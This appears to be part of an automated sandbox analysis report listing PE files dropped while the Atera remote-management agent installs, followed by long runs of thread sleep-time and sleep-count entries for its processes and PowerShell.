                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4e.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Requests.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\FormControlsLibrary.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Data.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebHeaderCollection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI422F.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7908Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7348Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7196Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2916Thread sleep count: 3643 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2916Thread sleep count: 6065 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4040Thread sleep count: 32 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4040Thread sleep time: -29514790517935264s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4040Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7800Thread sleep time: -90000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7732Thread sleep time: -3689348814741908s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7792Thread sleep time: -180000s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7872Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 5800Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 2424Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4908Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 2056Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 2000Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2676Thread sleep count: 6827 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 2676Thread sleep count: 2698 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5500Thread sleep count: 31 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5500Thread sleep time: -28592453314249787s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 5544Thread sleep time: -240000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3548Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7236Thread sleep count: 5252 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7284Thread sleep count: 1821 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -20291418481080494s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -599891s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -599754s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -599625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -599498s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -599389s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -599022s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598797s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598687s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598578s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598469s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598141s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -598031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597921s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597812s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597703s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597594s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597485s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597375s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597256s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597135s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -597031s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -596911s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -596782s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -596612s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 3052Thread sleep time: -596360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 2828Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8028Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1508Thread sleep count: 2668 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1508Thread sleep count: 7087 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1236Thread sleep time: -3689348814741908s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep count: 40 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -36893488147419080s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8128Thread sleep count: 5699 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599879s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599756s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599610s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8128Thread sleep count: 4098 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599490s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599250s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599136s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -599016s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598906s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598789s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598563s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598453s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598340s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598216s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -598107s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597985s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597860s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597735s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597610s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597468s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597359s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597244s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597130s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -597000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596781s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596563s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596449s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596328s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596215s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -596098s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595969s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595860s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595747s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595637s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595464s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595356s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595225s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -595106s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594993s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594875s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594764s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 8160Thread sleep time: -594641s >= -30000s
